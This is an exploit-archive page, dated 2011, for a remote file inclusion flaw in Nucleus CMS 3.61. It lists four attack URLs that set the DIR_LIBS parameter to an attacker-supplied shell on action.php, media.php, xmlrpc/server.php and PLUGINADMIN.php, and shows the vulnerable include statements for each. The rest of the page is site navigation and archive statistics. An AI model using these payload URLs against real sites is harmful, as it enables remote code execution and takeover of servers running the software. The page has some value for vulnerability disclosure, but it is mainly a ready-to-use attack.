Nucleus 3.61 Remote File Inclusion

Nucleus 3.61 Remote File Inclusion: Posted Jan 5, 2011; Authored by n0n0x; Nucleus version 3.61 suffers from a remote file inclusion vulnerability.; tags | exploit, remote, code execution, file inclusion; SHA-256 | 1c00349fc8cdb36c325ef957193f74a2861090d0bcaa88296b6efb357efa780e; Download | Favorite | View

Nucleus 3.61 Remote File Inclusion

#######################################################
#Nucleus v3.61 <=== Multiple Remote File Include
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://sourceforge.net/projects/nucleuscms/
#######################################################
=========================================
nucleus3.61/action.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
 
13. /**
14.  * File containing actions that can be performed by visitors of the site,
15.  * like adding comments, etc...
16.  * @license http://nucleuscms.org/license.txt GNU General Public License
17.  * @copyright Copyright (C) 2002-2009 The Nucleus Group
18.  * @version $Id: action.php 1388 2009-07-18 06:31:28Z shizuki $
19.  */
20.
21. $CONF = array();
22. require('./config.php');
23.
24. // common functions
25. include_once($DIR_LIBS . 'ACTION.php');  <=== RFI vuln
 
==========================================
nucleus3.61/nucleus/media.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
 
35. // include all classes and config data
36. require('../config.php');
37. include($DIR_LIBS . 'MEDIA.php');   // media classes
 
==========================================
nucleus3.61/nucleus/xmlrpc/server.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
 
63.  * @license http://nucleuscms.org/license.txt GNU General Public License
64.  * @copyright Copyright (C) 2002-2009 The Nucleus Group
67.  * @version $Id: server.php 1388 2009-07-18 06:31:28Z shizuki $
68.  */
69. $CONF = array();
70. require("../../config.php");    // include Nucleus libs and code
71. include($DIR_LIBS . "xmlrpc.inc.php");
 
==========================================
nucleus3.61/nucleus/libs/PLUGINADMIN.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
 
class PluginAdmin {
 
    var $strFullName;       // NP_SomeThing
    var $plugin;            // ref. to plugin object
    var $bValid;            // evaluates to true when object is considered valid
    var $admin;             // ref to an admin object
 
    function PluginAdmin($pluginName)
    {
        global $manager;
                include_once($DIR_LIBS . 'ADMIN.php');  
 
==========================================
################################################
Greetz: all member | manadocoding.org - sekuritiOnline.net
 
friends: str0ke, angky.tatoki, EA ngel, bL4Ck_3n91n3,  0pa, x0r0n, team_elite
            devilbat. cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet
################################################

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 99 files
Gentoo 29 files
indoushka 26 files
Debian 16 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Nucleus 3.61 Remote File Inclusion

Nucleus 3.61 Remote File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Nucleus 3.61 Remote File Inclusion

Share This

Nucleus 3.61 Remote File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems